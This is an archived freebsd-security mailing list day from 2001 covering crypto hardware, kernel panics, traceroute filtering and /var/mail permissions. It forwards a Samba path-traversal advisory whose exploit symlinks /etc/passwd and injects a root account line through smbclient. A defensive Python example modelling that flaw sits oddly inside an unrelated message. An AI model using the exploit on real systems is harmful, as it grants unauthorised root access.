Subject: Re: Status of encryption hardware support in FreeBSD
Message-ID: <20010624183147.F52432@mail.webmonster.de>
References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de>
In-Reply-To: from des@ofug.org on Sun, Jun 24, 2001 at 06:20:53PM +0200

Dag-Erling Smorgrav(des@ofug.org)@2001.06.24 18:20:53 +0000:
> "Karsten W.
Rohrbach" writes:
> > i think ipsec crypto abstraction into hardware is one side of the medal,
> > but the other side -- to be polished first -- is getting openssl onto
> > the iron.
>
> What you're basically trying to say is that you want a userland
> interface to the crypto hardware, so that OpenSSL can take advantage
> of it if it's present?

yup, exactly. to me it seems to be a major problem to get some unified api out of openssl addressing functions on the hardware -- i simply do not know how other crypto chipsets do it, i just investigated the rainbow board. they got a patch against openssl 0.9.5 i think, that glues in the driver calls instead of standard lib functions.

>
> > as i said, there is a 3.x freebsd driver, would this help?
> > i am not into writing drivers ;-)
>
> Allow me to repeat myself: "driver source does not constitute adequate
> documentation. It helps, but it's neither sufficient nor necessary."

yes yes yes ;-) you are perfectly right here. i just wanted to mention that there is an _existing_ driver and patch against the openssl lib, also some test programs to check if the driver works, for freebsd 3.x.

> A 3.x driver *could* be ported forward to 4.x and 5.x, but the
> required changes are not trivial (newbus, SMPng...) and you'd still
> need sample boards for testing and debugging, and docs for reference
> when you don't understand what the existing driver is trying to do.

sure. my impression with the rainbow guys was, that they are very open to the opensource community. they supplied a board, (user) docs and the unreleased driver/openssl code to us and i was very impressed by their attitude towards people hacking up their stuff *grin*. alas, i quit the company and i did not even start really hacking on the code to take it to a place even near to production. i see from their web page, that they now support freebsd 4.1-release, so it sounds rather appealing to me...

/k
--
> Captain Hook died of jock itch.
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
Please do not remove my address from To: and Cc: fields in mailing lists.

From owner-freebsd-security Sun Jun 24 9:38:39 2001
To: "Karsten W.
Rohrbach"
Cc: Soren Kristensen, hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Status of encryption hardware support in FreeBSD
References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> <20010624183147.F52432@mail.webmonster.de>
From: Dag-Erling Smorgrav
Date: 24 Jun 2001 18:38:31 +0200
In-Reply-To: <20010624183147.F52432@mail.webmonster.de>

"Karsten W. Rohrbach" writes:
> yup, exactly. to me it seems to be a major problem to get some unified
> api out of openssl addressing functions on the hardware -- i simply do
> not know how other crypto chipsets do it, i just investigated the
> rainbow board. they got a patch against openssl 0.9.5 i think, that
> glues in the driver calls instead of standard lib functions.

Can you dig out this patch for me? It would be a big win if the userland interface to Soren's hardware were compatible with Rainbow's driver.

> yes yes yes ;-) you are perfectly right here. i just wanted to mention
> that there is an _existing_ driver and patch against the openssl lib,
> also some test programs to check if the driver works, for freebsd 3.x.

This would be useful for ensuring compatibility with Rainbow's stuff, especially if, as you say, they have a 4.1 version out now.
DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Sun Jun 24 9:43:42 2001
Message-Id: <200106241642.f5OGgOx31237@cwsys.cwsent.com>
From: Cy Schubert - ITSD Open Systems Group
Reply-To: Cy Schubert - ITSD Open Systems Group
To: security-officer@freebsd.org, dwcjr@freebsd.org
Cc: freebsd-security@freebsd.org
Subject: smbd remote file creation vulnerability (fwd)
Date: Sun, 24 Jun 2001 09:42:04 -0700

Just received this from BUGTRAQ...
Security-officer & dwcjr, this is just a heads up that a Samba patch is coming down the pipe RSN. freebsd-security mailing list users using Samba, FYI.

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Team Leader, Sun/Alpha Team    Internet: Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

------- Forwarded Message
[headers removed]
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Delivered-To: mailing list bugtraq@securityfocus.com
Date: Sat, 23 Jun 2001 23:24:26 -0400 (EDT)
From: Michal Zalewski
To: bugtraq@securityfocus.com
Subject: smbd remote file creation vulnerability

** Please hold with approving this one before Monday, if possible. **
This is a forced release.

Author: Michal Zalewski

Topic: Insufficient parameter validation and unsafe default configuration make numerous systems running the samba SMB file sharing daemon vulnerable to remote attacks.

Vulnerable platforms: Tested on smbd 2.0.7 shipped with RedHat Linux 7.0 and 7.1. Confirmed on 2.0.8.

Overview:

Due to insufficient NetBIOS computer name validation in incoming SMB requests, in conjunction with the default configuration found for example in RedHat Linux and derivatives, the samba daemon allows remote attackers to create SMB session log files (*.log) with highly attacker-dependent contents outside the logs directory. This vulnerability itself can be used to perform DoS attacks, or, if combined with unprivileged local access, can be used to gain superuser privileges.

On vulnerable platforms, by default, each SMB session is logged to the file /var/log/samba/.log.
If the attacker is connecting from 'FOOBAR', logs would be put in /var/log/foobar.log. Unfortunately, the NetBIOS name '../../../evil' would be accepted as well, creating the /evil.log file. This vulnerability is exploitable if the following setting is present in the smb.conf file:

  log file = /var/log/samba/%m.log

...which is the default on major Linux distributions, and probably a few other platforms as well. On some systems, the configuration might be different:

  log file = /usr/local/samba/var/log.%m

In the second case (e.g. FreeBSD), there is usually no way to exploit this vulnerability.

Additionally, as noticed by Mark Loveless, using specific NetBIOS names, like 'non/existing/dir', it is possible to avoid logging of error messages (e.g. authentication failures) at all, which might be very useful for performing brute-force attacks.

Note that any non-default configuration not using any prefix or suffix (log- or .log) in the log filename would be vulnerable to instant remote compromise.

Exploit:

This is the scenario of a local privilege escalation attack against a RedHat 7.x installation:

  $ ln -s /etc/passwd /tmp/x.log
  $ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
    -n ../../../tmp/x -N

...where 'NIMUE' stands for the local host name (a few error messages should be returned).

  $ su toor
  #

Explanation of this attack is pretty trivial. The Samba daemon tries to access the logfile for the host introducing itself as '../../../tmp/x'. This translates to open() on /var/log/samba/../../../tmp/x.log. Thus, /tmp/x.log is opened in O_APPEND mode, following the previously created symlink to /etc/passwd. Then, the anonymous attempt to mount the non-existing share named "\ntoor::0:0::/:/bin/sh\n" is logged in /tmp/x.log, or, if you prefer, in /etc/passwd.
The error message looks this way:

  [2001/06/22 14:53:03, 1] smbd/reply.c:reply_sesssetup_and_X(925)
    Rejecting user 'lcamtuf': authentication failed
  [2001/06/22 14:53:03, 0] smbd/service.c:make_connection(214)
    ../../../tmp/x (192.233.133.108) couldn't find service
  toor::0:0::/:/bin/sh

The last line is, obviously, accepted by /bin/su or /bin/login.

Fix information:

As a temporary workaround, we suggest changing the 'log file' setting, as described above. This vulnerability has been confirmed by the vendor, and is addressed here: http://us1.samba.org/samba/whatsnew/macroexploit.html

Removing '%m' altogether would protect against attackers trying to avoid logging at all.

The vendor was informed; the fix will be publicly available soon.

------- End of Forwarded Message

From owner-freebsd-security Sun Jun 24 9:54:23 2001
From: "Ted Mittelstaedt"
Subject: RE: Kernel Panic
Date: Sun, 24 Jun 2001 09:54:03 -0700
Message-ID: <006501c0fcce$45fc5080$1401a8c0@tedm.placo.com>
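The log-file expansion described in the Samba advisory forwarded above, as an added example that is not code from the advisory, from Samba, or from any message in this thread: it substitutes a NetBIOS name into the two `log file` templates the advisory quotes, shows which names escape the log directory, replays the symlink-append step in a scratch directory, and applies two checks that stop it. The templates are the advisory's; the name policy, the scratch files and the 192.0.2.1 address are assumptions constructed for the example.

```python
"""Added example, not code from the advisory, from Samba, or from anyone in
this thread: models the `log file = .../%m.log` expansion the advisory
describes, shows which NetBIOS names escape the log directory, reproduces the
symlink-append trick under a scratch directory, and shows two checks that stop
it. Templates are the two quoted in the advisory; the name policy, the scratch
files and the 192.0.2.1 address are constructed for this example."""
import errno
import os
import posixpath
import re
import tempfile

TEMPLATE_VULNERABLE = "/var/log/samba/%m.log"       # layout the advisory calls exploitable
TEMPLATE_PREFIXED = "/usr/local/samba/var/log.%m"   # layout it says is usually not

# Assumed policy for this example (not Samba's own rule): a NetBIOS name is a
# plain token of letters, digits, '-' and '_', at most 15 characters.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,15}$")


def expand_log_path(template, netbios_name):
    """Naive %m substitution as the advisory describes it; 'FOOBAR' becomes
    'foobar.log', so the name is lowercased."""
    return template.replace("%m", netbios_name.lower())


def escapes_log_dir(template, netbios_name):
    """Lexical check: does the expanded path normalise to a location outside
    the template's directory?"""
    log_dir = posixpath.dirname(template)
    expanded = posixpath.normpath(expand_log_path(template, netbios_name))
    return posixpath.commonpath([log_dir, expanded]) != log_dir


def safe_log_path(template, netbios_name):
    """Hardened expansion: reject anything that is not a plain NetBIOS-style
    token, then re-check the result. Raises ValueError on rejection, which
    also covers the 'non/existing/dir' trick used to suppress logging."""
    if not _SAFE_NAME.match(netbios_name):
        raise ValueError("rejected NetBIOS name %r" % netbios_name)
    if escapes_log_dir(template, netbios_name):
        raise ValueError("expanded path leaves the log directory")
    return expand_log_path(template, netbios_name)


def append_log_line(path, line, follow_symlinks=True):
    """Append one line the way a daemon writing a session log does.

    follow_symlinks=True is the plain open(O_APPEND) the advisory describes.
    With False the open adds O_NOFOLLOW and the function returns False instead
    of writing through a planted symlink (Linux reports ELOOP, FreeBSD EMLINK)."""
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT
    if not follow_symlinks:
        flags |= os.O_NOFOLLOW
    try:
        fd = os.open(path, flags, 0o644)
    except OSError as exc:
        if exc.errno in (errno.ELOOP, errno.EMLINK):
            return False
        raise
    with os.fdopen(fd, "a") as fh:
        fh.write(line + "\n")
    return True


def demo_symlink_append():
    """Replay the advisory's trick under a scratch directory: 'x.log' is a
    symlink to a constructed 'passwd', and the service name carries the
    injected account line. Returns (naive_wrote, hardened_wrote, passwd_lines)."""
    with tempfile.TemporaryDirectory() as root:
        passwd = os.path.join(root, "passwd")
        with open(passwd, "w") as fh:
            fh.write("root:x:0:0::/root:/bin/sh\n")   # stand-in for /etc/passwd
        link = os.path.join(root, "x.log")
        os.symlink(passwd, link)
        service = "\ntoor::0:0::/:/bin/sh\n"          # the share name from the advisory
        log_line = "../../../tmp/x (192.0.2.1) couldn't find service " + service
        naive = append_log_line(link, log_line)                         # follows the symlink
        hardened = append_log_line(link, log_line, follow_symlinks=False)
        with open(passwd) as fh:
            lines = fh.read().splitlines()
    return naive, hardened, lines


if __name__ == "__main__":
    for name in ("FOOBAR", "../../../tmp/x", "non/existing/dir"):
        print("%-18s -> %s (escapes: %s)" % (
            name, expand_log_path(TEMPLATE_VULNERABLE, name),
            escapes_log_dir(TEMPLATE_VULNERABLE, name)))
    print(demo_symlink_append())
```

The lexical check alone is conservative: applied to the prefixed template it also flags '../../../tmp/x', even though there the open usually fails because the first component ("log..") is not an existing directory. The name policy is the check that actually closes the hole, and O_NOFOLLOW on the log open is the belt-and-braces measure for the symlink half of the attack.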
>-----Original Message-----
>From: des@ofug.org [mailto:des@ofug.org]
>Sent: Sunday, June 24, 2001 9:25 AM
>To: Ted Mittelstaedt
>Cc: js43064n@pace.edu; freebsd-questions@FreeBSD.ORG;
>freebsd-stable@FreeBSD.ORG; freebsd-security@FreeBSD.ORG
>Subject: Re: Kernel Panic
>
>
>"Ted Mittelstaedt" writes:
>> That's a case I hadn't thought of - however, "local" search paths should
>> generally be at the END of the user's path, not the beginning, in which case
>> the system binary gets called first.
>
>No! Local paths should be at the beginning, so local binaries
>(wrappers etc.) can override system binaries.
>

I was half-expecting you to say something like that. In response:

NO, local wrappers should NEVER be named the same as system binaries, because the user then gets used to assuming that the wrapper is in place on all systems. Imagine a local wrapper named "rm" that instead of deleting the file puts it in a "garbage pail". You get used to the garbage pail and get sloppy in what you remove - then one day you're on another system and do an "rm" without thinking, then realize a mistake, go to the "garbage pail" and find that it doesn't exist. Wahhh!!!!

Now, if you are the administrator and you want to wrap a system binary then you do it by renaming the system binary something else, and putting the wrapper in the place the system binary is. But that's not a case of a local binary.

>> Both cases are bad practice, and shouldn't be present on a normal system.
>
>Bollocks.
>

Bollocks back. If you name your local wrappers your own names then the wrapper works fine if the local path is at the end of the search path. I can see putting the local path at the front for TEMPORARY use - like if you were developing a system binary you wanted to repeatedly test - but you go out on a big limb by making a bunch of custom wrappers that duplicate the system binary names.
>> I think in that situation you would have to have a swap partition that's
>> smaller than the maximum amount of RAM that a normal user is permitted to
>> allocate - in that case the limits are set too high.
>
>That, or the limits simply don't account for all the resources a user
>can consume, as is the case with mmap().
>

OK - but then this is a case where the limiting device is broken. Maybe that should be worked on as well as the swap problem too, no?

Ted Mittelstaedt                      tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com

From owner-freebsd-security Sun Jun 24 9:55:50 2001
Date: Sun, 24 Jun 2001 12:56:12 -0400
From: Daniel Harris
To: Cy Schubert - ITSD Open Systems Group
Cc: freebsd-security@freebsd.org
Subject: Re: smbd remote file creation vulnerability (fwd)
Message-ID: <20010624125612.A9327@dannyboy.worksforfood.com>
References: <200106241642.f5OGgOx31237@cwsys.cwsent.com>
In-Reply-To: <200106241642.f5OGgOx31237@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Sun, Jun 24, 2001 at 09:42:04AM -0700
On Sun, Jun 24, 2001 at 09:42:04AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> Just received this from BUGTRAQ...
>
> Security-officer & dwcjr, this is just a heads up that a Samba patch is
> coming down the pipe RSN.

dwcjr committed the updates to samba (2.0.10 and 2.2.0a) yesterday.

--
Daniel Harris

From owner-freebsd-security Sun Jun 24 9:57:15 2001
From: "Ted Mittelstaedt"
Subject: RE: Kernel Panic
Date: Sun, 24 Jun 2001 09:56:56 -0700
Message-ID: <006601c0fcce$ad789fc0$1401a8c0@tedm.placo.com>
I didn't say "disk error", I said "disk system", and I made a particular point in the first message of saying that such an error is most likely due to a combination of problems with the motherboard and disk. And YES, a disk subsystem error CAN crash the system, in fact not only crash it but completely garbage the filesystem in the process.

I think your own imagination has run away with you. ;-)

Ted Mittelstaedt                      tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com

>-----Original Message-----
>From: des@ofug.org [mailto:des@ofug.org]
>Sent: Sunday, June 24, 2001 9:27 AM
>To: Ted Mittelstaedt
>Cc: js43064n@pace.edu; freebsd-questions@FreeBSD.ORG;
>freebsd-stable@FreeBSD.ORG; freebsd-security@FreeBSD.ORG
>Subject: Re: Kernel Panic
>
>
>"Ted Mittelstaedt" writes:
>> One other thing - the recursive script the user originally posted does not
>> appear to consume all free swap in the system. I still maintain he has a
>> hardware error in the disk system.
>
>A disk error would not crash the system. Please stop spouting
>unfounded (though highly imaginative) bullshit.
>
>DES
>--
>Dag-Erling Smorgrav - des@ofug.org
>

From owner-freebsd-security Sun Jun 24 10:40:28 2001
Message-ID: <3B36267B.5B5FDBE@inforta.com>
Date: Sun, 24 Jun 2001 19:42:19 +0200
From: Simon Rakovec
To: freebsd-security@freebsd.org
Subject: Re: disable traceroute to my host
References: <006a01c0fb6b$2d64d830$9865fea9@book>

Try this:

  ipfw add deny udp from any 32769-65535 to any 33434-33523

Regards,
Simon

alexus wrote:
>
> is it possible to disable using ipfw so people won't be able to traceroute
> me?
> > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 24 11:14:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 8347737B40B for ; Sun, 24 Jun 2001 11:14:36 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 57928 invoked by uid 1000); 24 Jun 2001 18:14:56 -0000 Date: Sun, 24 Jun 2001 20:14:56 +0200 From: "Karsten W. Rohrbach" To: Dag-Erling Smorgrav Cc: Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Status of encryption hardware support in FreeBSD Message-ID: <20010624201456.A57877@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Dag-Erling Smorgrav , Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> <20010624183147.F52432@mail.webmonster.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="tThc/1wpZn/ma/RB" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Sun, Jun 24, 2001 at 06:38:31PM +0200 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --tThc/1wpZn/ma/RB Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Dag-Erling Smorgrav(des@ofug.org)@2001.06.24 18:38:31 +0000: > "Karsten W. Rohrbach" writes: > > yup, exactly. 
> > to me it seems to be a major problem to get some unified
> > api out of openssl addressing functions on the hardware -- i simply do
> > not know how other crypto chipsets do it, i just investigated the
> > rainbow board. they got a patch against openssl 0.9.5 i think, that
> > glues in the driver calls instead of standard lib functions.
>
> Can you dig out this patch for me? It would be a big win if the
> userland interface to Soren's hardware were compatible with Rainbow's
> driver.

i think it would be a wise choice to ask rainbow for the current stuff,
as they are stating 4.1-rel would be supported. i'll get back to you guys
with the contact addresses off-list.

/k
--
> Life is a sexually transmitted disease.
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
Please do not remove my address from To: and Cc: fields in mailing lists.
10x

From owner-freebsd-security Sun Jun 24 11:34:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 5EE3C37B401 for ; Sun, 24 Jun 2001 11:34:20 -0700 (PDT) (envelope-from karsten@rohrbach.de)
Received: (qmail 58543 invoked by uid 1000); 24 Jun 2001 18:34:40 -0000
Date: Sun, 24 Jun 2001 20:34:40 +0200
From: "Karsten W. Rohrbach"
To: Simon Rakovec
Cc: freebsd-security@freebsd.org
Subject: Re: disable traceroute to my host
Message-ID: <20010624203440.C57877@mail.webmonster.de>
Mail-Followup-To: "Karsten W. Rohrbach" , Simon Rakovec , freebsd-security@freebsd.org
References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com>
Mime-Version: 1.0
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3B36267B.5B5FDBE@inforta.com>; from simon@inforta.com on Sun, Jun 24, 2001 at 07:42:19PM +0200
X-Arbitrary-Number-Of-The-Day: 42
X-URL: http://www.webmonster.de/
X-Disclaimer: My opinions do not necessarily represent those of my employer

Simon Rakovec(simon@inforta.com)@2001.06.24 19:42:19 +0000:
> Try this:
>
> ipfw add deny udp from any 32769-65535 to 33434-33523

one might note on that, that this is no proper practice, it simply does
no good regarding proper network operation. imagine, there are people out
there who operate networks with more than 20 routers -- if you deploy
those filters you probably do not make new friends, especially in the isp
field.

that said, a better choice would be putting /sbin/shutdown -p now in
/etc/rc.local *grin*

have a nice one
/k

>
> Regards, Simon
>
> alexus wrote:
> >
> > is it possible to disable using ipfw so people won't be able to traceroute
> > me?

--
> Only wimps use tape backups; real men put their software on ftp-servers
> and let the rest of the world mirror it.
> --Linus Torvalds
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
Please do not remove my address from To: and Cc: fields in mailing lists.
10x

From owner-freebsd-security Sun Jun 24 11:53:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from server.soekris.com (soekris.com [216.15.61.44]) by hub.freebsd.org (Postfix) with ESMTP id BFC6537B401; Sun, 24 Jun 2001 11:53:14 -0700 (PDT) (envelope-from soren@soekris.com)
Received: from soekris.com (soren.soekris.com [192.168.1.4]) by server.soekris.com (8.9.2/8.9.2) with ESMTP id LAA53569; Sun, 24 Jun 2001 11:53:26 -0700 (PDT) (envelope-from soren@soekris.com)
Message-ID: <3B363713.2849219@soekris.com>
Date: Sun, 24 Jun 2001 11:53:07 -0700
From: Soren Kristensen
Organization: Soekris Engineering
X-Mailer: Mozilla 4.75 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: "Karsten W. Rohrbach"
Cc: Dag-Erling Smorgrav , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Status of encryption hardware support in FreeBSD
References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> <20010624183147.F52432@mail.webmonster.de> <20010624201456.A57877@mail.webmonster.de>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,

Thanks for the responses so far.

First, let me say that I'm a hardware guy, and don't know all the details
of FreeBSD's network stack.

There are two common kinds of hardware encryption acceleration, and I
think they're being mixed up a little here.

SSL is for secure web access, and the main need is for Public Key
generation. This doesn't really have anything to do with the IP stack.
Afaik, OpenSSL is more like an extension to the web server software.

IPSec is for secure communication, and the main need is for symmetric data
encryption, typically using 3-DES. This needs to be closely integrated in
the IP stack.

The boards I'm doing now are based on a Hi/fn 7951, which is designed for
VPN routers doing IPSec. It's supported in OpenBSD 2.9.

And btw, hardware beats software anytime. The fastest PC processor right
now is about the same speed as the slowest hardware....

The reason why I posted originally was to figure out who is working on
these things, as I remember seeing a post some time ago about work being
done to import some of the IPSec work from OpenBSD. The Kame project
people might be the ones to talk to, but isn't there a need for a FreeBSD
specific hardware driver anyway?

I will be happy to donate hardware to the FreeBSD project.
Regards,

Soren

From owner-freebsd-security Sun Jun 24 12: 8:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-13.dsl.lsan03.pacbell.net [63.207.60.13]) by hub.freebsd.org (Postfix) with ESMTP id 1319F37B401; Sun, 24 Jun 2001 12:08:08 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id F293A66BF7; Sun, 24 Jun 2001 12:08:05 -0700 (PDT)
Date: Sun, 24 Jun 2001 12:08:05 -0700
From: Kris Kennaway
To: Dag-Erling Smorgrav
Cc: "Karsten W. Rohrbach" , Soren Kristensen , hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Status of encryption hardware support in FreeBSD
Message-ID: <20010624120805.A67128@xor.obsecurity.org>
References: <3B33A891.EC712701@soekris.com> <20010624181007.C52432@mail.webmonster.de> <20010624183147.F52432@mail.webmonster.de>
Mime-Version: 1.0
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from des@ofug.org on Sun, Jun 24, 2001 at 06:38:31PM +0200

On Sun, Jun 24, 2001 at 06:38:31PM +0200, Dag-Erling Smorgrav wrote:
> "Karsten W. Rohrbach" writes:
> > yup, exactly. to me it seems to be a major problem to get some unified
> > api out of openssl addressing functions on the hardware -- i simply do
> > not know how other crypto chipsets do it, i just investigated the
> > rainbow board. they got a patch against openssl 0.9.5 i think, that
> > glues in the driver calls instead of standard lib functions.
>
> Can you dig out this patch for me? It would be a big win if the
> userland interface to Soren's hardware were compatible with Rainbow's
> driver.

I believe there is support in OpenSSL for this now (though not in the
version we currently have imported; it's the OpenSSL-engine branch which
supports hardware offload). Once there's a point to do so (e.g. whatever
relevant kernel support), I can import this into FreeBSD.

Kris

From owner-freebsd-security Sun Jun 24 12:52:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 05D5137B401; Sun, 24 Jun 2001 12:52:26 -0700 (PDT) (envelope-from dillon@earth.backplane.com)
Received: (from dillon@localhost) by earth.backplane.com (8.11.3/8.11.2) id f5OJpqV79628; Sun, 24 Jun 2001 12:51:52 -0700 (PDT) (envelope-from dillon)
Date: Sun, 24 Jun 2001 12:51:52 -0700 (PDT)
From: Matt Dillon
Message-Id: <200106241951.f5OJpqV79628@earth.backplane.com>
To: Dag-Erling Smorgrav
Cc: "Ted Mittelstaedt" , , , ,
Subject: Re: Kernel Panic
References: <004101c0fc8c$44e12280$1401a8c0@tedm.placo.com>

:
:> However, if the script DID load itself, a recursive script
:> under an ordinary user ID isn't allowed to crash the
:> system.
:
:Yes it is, unfortunately. FreeBSD doesn't like running out of swap
:space. Matt Dillon has been trying to correct this in -CURRENT, but
:it's not completely fixed yet.
:
:DES
:--
:Dag-Erling Smorgrav - des@ofug.org

    The out of swap handling should be completely fixed on -current and
    -stable now. My tests and Paul Saab's tests come up roses now.

    In regards to the original author's bug report... I haven't heard
    what version of FreeBSD he is running. Under normal circumstances a
    runaway script should not be able to take the machine down. Prior to
    the swap handling fixes, if sufficient resource limits are set or the
    script is run as root, then such a script could lock up the machine.

    But it is also unclear to me what the author meant by "crash"... did
    it panic? Was there a panic message? Did it start bashing the disks
    and appear not to stop? What?

                                        -Matt

From owner-freebsd-security Sun Jun 24 14: 0:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pltn13.pbi.net (mta8.pltn13.pbi.net [64.164.98.22]) by hub.freebsd.org (Postfix) with ESMTP id A3CB337B409 for ; Sun, 24 Jun 2001 14:00:50 -0700 (PDT) (envelope-from leonard@ssl.berkeley.edu)
Received: from zeus.berkeley.edu ([206.170.1.101]) by mta8.pltn13.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GFG00A82D17K5@mta8.pltn13.pbi.net> for security@FreeBSD.ORG; Sun, 24 Jun 2001 14:00:48 -0700 (PDT)
Date: Sun, 24 Jun 2001 14:11:54 -0700
From: Leonard Chung
Subject: "Correct" permissions on /var/mail?
X-Sender: leonard@chung.yikes.com (Unverified)
To: security@FreeBSD.ORG
Message-id: <5.1.0.14.2.20010624140225.02d492f0@chung.yikes.com>
MIME-version: 1.0
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Content-type: text/plain; charset=us-ascii; format=flowed
Content-transfer-encoding: 7BIT

I was having a debate with a colleague the other day on the correct mode
for /var/mail. He claimed that 1777 is more secure than what I've always
had (the FreeBSD default of root:mail 775).

1777 gives you the additional benefit of protecting you from compromises on
the mail group, but requires that on every machine quotas be installed even
for machines with just one or two users. Without quotas, a malicious user
could fill up /var/mail creating a DoS for everybody receiving mail off
that machine. 775 doesn't protect against compromises of the mail group,
but has the added benefit that it protects against a user filling /var/mail
inadvertently as they would have to purposely send lots of e-mail.

Which do most of you use? Is there a reason /var/mail is initially set to
775 rather than 1777?

Thanks,

Leonard

--
Leonard Chung -
SETI@home - The Search for Extraterrestrial Intelligence @ home
http://www.setiathome.ssl.berkeley.edu

From owner-freebsd-security Sun Jun 24 14: 5:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from i-sphere.com (shell.i-sphere.com [209.249.146.70]) by hub.freebsd.org (Postfix) with ESMTP id E475837B406 for ; Sun, 24 Jun 2001 14:05:49 -0700 (PDT) (envelope-from fasty@i-sphere.com)
Received: (from fasty@localhost) by i-sphere.com (8.11.3/8.11.3) id f5OLDMS77908; Sun, 24 Jun 2001 14:13:22 -0700 (PDT) (envelope-from fasty)
Date: Sun, 24 Jun 2001 14:13:22 -0700
From: faSty
To: Leonard Chung
Cc: freebsd-security@freebsd.org
Subject: Re: "Correct" permissions on /var/mail?
Message-ID: <20010624141322.A77852@i-sphere.com>
References: <5.1.0.14.2.20010624140225.02d492f0@chung.yikes.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <5.1.0.14.2.20010624140225.02d492f0@chung.yikes.com>; from leonard@ssl.berkeley.edu on Sun, Jun 24, 2001 at 02:11:54PM -0700

Yes, the FreeBSD default is 775 on /var/mail, but my email server kept
complaining that /var/mail is a potential security problem, so I had to
set 1777 to shut the email server up. It seems safe; no security exploit
lately on my shell server with 20 hardcore shell customers.

PS. This is going to be an interesting topic to discuss.. I'm forwarding
to hear other people's opinions.

-trev

On Sun, Jun 24, 2001 at 02:11:54PM -0700, Leonard Chung wrote:
> I was having a debate with a colleague the other day on the correct mode
> for /var/mail. He claimed that 1777 is more secure than what I've always
> had (the FreeBSD default of root:mail 775).
>
> 1777 gives you the additional benefit of protecting you from compromises on
> the mail group, but requires that on every machine quotas be installed even
> for machines with just one or two users. Without quotas, a malicious user
> could fill up /var/mail creating a DoS for everybody receiving mail off
> that machine. 775 doesn't protect against compromises of the mail group,
